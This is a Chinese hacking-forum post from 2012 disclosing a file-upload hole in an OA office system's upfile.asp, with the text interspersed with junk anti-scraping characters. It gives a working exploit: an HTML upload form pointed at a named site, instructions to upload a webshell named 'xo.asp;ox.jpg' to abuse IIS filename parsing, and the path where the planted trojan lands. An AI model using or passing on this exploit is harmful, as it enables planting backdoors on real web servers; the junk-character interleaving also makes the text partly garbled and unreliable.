找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2300|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞- A$ Q2 f( R' e* `  R. j

. k5 m6 R0 h8 t- z0 S7 |' F; g系统介绍:% M" l/ D9 ^8 }( R* S2 W; m( A  g- d
3 n5 p# I) X6 f% V5 y  Z
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
9 x6 j9 V4 n5 K3 b1 C5 B
6 c1 g* z) o6 A* x主要功能:! q0 U9 Q- Q) a6 l0 P2 w% R  I
公司通告 , r6 g7 W/ F. D2 O9 R$ z  E# `& z
工作计划
- I( q, u$ ~$ I9 j# y- b通讯助理 6 Z5 ~( M2 b& |
客户资源 ; Y3 n" h' I% D9 w% B
我的公文 & }% \( r+ X1 y3 X( `
公文传阅 9 L4 m, P. I6 O* s, b
公共资源
& ?) O: C7 E) y; i, W资源预约 ! H  a" B; ~% Z" }- _. _9 \
今日考勤
. B/ m8 [  v* y' ~个人计划
6 ?. H/ x" I. a: _: }2 o个人通讯录
0 R5 c/ ?3 E5 t& r* i* [个人基本档案
+ \1 g7 {) c+ p; Z4 |未读邮件
) `) J# H  j7 c8 p' F% v% O发邮件
$ |& P; p5 N) D3 R收件夹
: _; W! V9 q# t0 u# W6 J9 V) {寄件夹 . U% h  p& ?' u
网络硬盘 8 I0 W. k0 X) _' x3 C
网络会议
1 N* N' L2 z- f. l网络调查
& @2 X% ]4 u# i, D  q3 g$ _交流论坛
! Q8 ]/ \5 \8 e, R5 e, d: k, Z" e* ^6 a0 L! @, ^* U
有兴趣测试的朋友可以下源码看看8 Z7 i1 s  R3 j, ?  x# V% j

# \! P  U# o* H7 ]源码下载:1 O/ m& q' m7 }, F% e4 H

8 q( D" D% T6 K9 Uhttp://www.mycodes.net/30/4750.htm
$ ?) E; Q" y! M+ l- l: _
; y  v; g' _  r- X漏洞介绍:
8 q# \1 H* n* c, a. Y8 ?% B& d+ L( r; _. ?7 m! M# v
由upfile.asp上传文件漏洞引起
+ w: l9 K* U) z' r% ~! r: b; P0 q: Q* p0 }. E
测试方法:7 `6 V# ]6 e6 C3 n% K- M

$ v6 Z' W( K0 Q, ]5 @) q: I! k使用名小子上传http://www.itlynn.com/upfile.asp即可
: T# V6 t0 n! S8 E4 ~3 F& t" U: X- e& X8 B2 Z9 h& V
如果upfile.asp文件被删除不存在。
" |8 q4 Y- T. Y7 D9 z8 B' P8 ~% w. @5 f* V1 K
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
! w4 G; C0 m. k6 L2 F6 S0 A2 E
$ }6 d; M! O" g# P如果存在那么将如下代码保存为upfile.html。
5 h6 I  \& I' y1 |& f# a8 G8 O# a1 t, z) \7 i
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
2 m! S1 U! h1 a( M! \# N6 d
& W0 N5 ^$ `& q/ b
8 }4 h4 W- S. e9 q( e; Q6 E) V4 Q7 ?8 z5 b9 m
01 <table border='0' align="center" cellpadding="5">
$ F& u, @8 A2 I" @0 C" X, [; E4 K4 w2 o( U$ i  g9 V( `
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
; j& z. l- o0 {3 @9 ]4 w0 l( w/ B3 B2 d  B
03 <tr>
& t& b9 {% s" L( E2 F! h
/ E- t/ B+ S+ o04             <td>报错:</td>
. q7 g# c  [1 }* {4 g. w* w
1 I. h# G1 Q! J, U, k+ U05             <td><input type='radio' name='errnumber' value='0'>
7 k3 e! O0 ^6 A9 |+ m: l: X
4 I/ ?  ?/ V% }7 s, K7 a; O- X06               自动更名
& U4 `. I3 }/ o2 v* \. @7 y1 v: b1 h% Q* ]' e
07               <input type='radio' name='errnumber' value='1' checked>
7 |/ q- v+ h2 @8 S" g, b' m. k. U2 E3 F7 w+ y5 |) }
08               报错方式
  C$ x! v/ ]8 p5 }8 p" F3 R  Q- x4 K  P: @% ~  c
09               <input type='radio' name='errnumber' value='2'> 0 n/ |2 T% }3 h; v
' w3 [- u  C% f# t. C  u
10               直接覆盖</td> % Q  ^) K; ^) u) o) E
4 Y% d" }' {! x: Z- G
11           </tr>
6 F) F/ R+ @  n( @, w
( D0 m6 C) Z, t. B12           <tr>
, u4 g( V' p4 m' m* {2 ]
, ~; j3 l3 }) q1 f4 H4 x13             <td>主题:</td> 5 L( U/ B. g8 M: _* i) V% i
0 U% B3 \. S. e5 y" e
14             <td><input type='text' name='filename' size='30'></td> % z9 p3 L& u  o+ n3 b: }

' A2 z; V5 ?8 q( G15           </tr>
1 d; p! ^, }- C2 N1 w9 ]4 \, |, X) \& Y& v1 f7 Z9 _6 p; h
16           <tr>
- v: b4 g4 g3 |$ t) F% U) B3 s+ g$ }: W2 l: ?0 W% J8 F$ q
17             <td>文件:</td> 4 f( a  g+ J' w  S1 {
! q4 j+ M0 K* [" e. a+ r  @
18             <td><input type="file"name="fruit"size="30"></td> " K. [( e  Q% `( T9 x; N9 K% }

5 z! j8 g8 t8 A19           </tr> % o; J3 f+ K' z- n! Z0 N

( s' z) z9 W) B2 M( N20           <tr> 7 M2 _% x8 m, Z  C; ^& t" w1 L
* I1 Q6 n, C) W' i- `2 N
21             <td valign='top'>简介:</td>
7 |( s9 f) \1 c: s% q
! A# f2 p3 \0 O9 d22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
1 i" [1 D0 [- Q  u4 R) s
3 @- }  N3 Q5 q' [9 @  ~5 b8 f23           </tr> / ]* d5 n. o' r" ^

. D- P- i4 C; S  c24     J8 u0 L7 P- Q% T) \7 O9 m
. c) p2 K/ P8 ?* a" j- }- [
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> , u) Z  [0 Q+ U, ~4 E4 T  _, W  L
7 R% B. ]9 ?* E# {9 o; J
26           </tr>   J9 ~' ?+ W3 V0 y" y! s

* N5 q7 Z4 ?7 |4 H: Q9 I, O' E% ~27         </form> 0 f( M' y; _; D6 j

! L/ @6 j+ |8 ~/ {; t0 D  F然后打开上传一个文件名为xo.asp;ox.jpg的文件。) M% g0 a/ I3 c/ H2 \4 o$ h7 q7 Q

! d7 \0 Q3 T& w5 ?& I, P1 ~0 y
7 p! v6 A& e5 ^1 f1 @( c5 C, c; a8 n5 i' g( u1 p; I6 f
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
# @( W8 u  T# ~4 V% r2 z
5 a* t- H, U- T- x2 q; v7 `# t此漏洞需要配合解析漏洞利用。
, v- A: Z' n( w9 D9 [$ w9 k) Y: R/ L
- L( G1 o; C, H9 N2 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表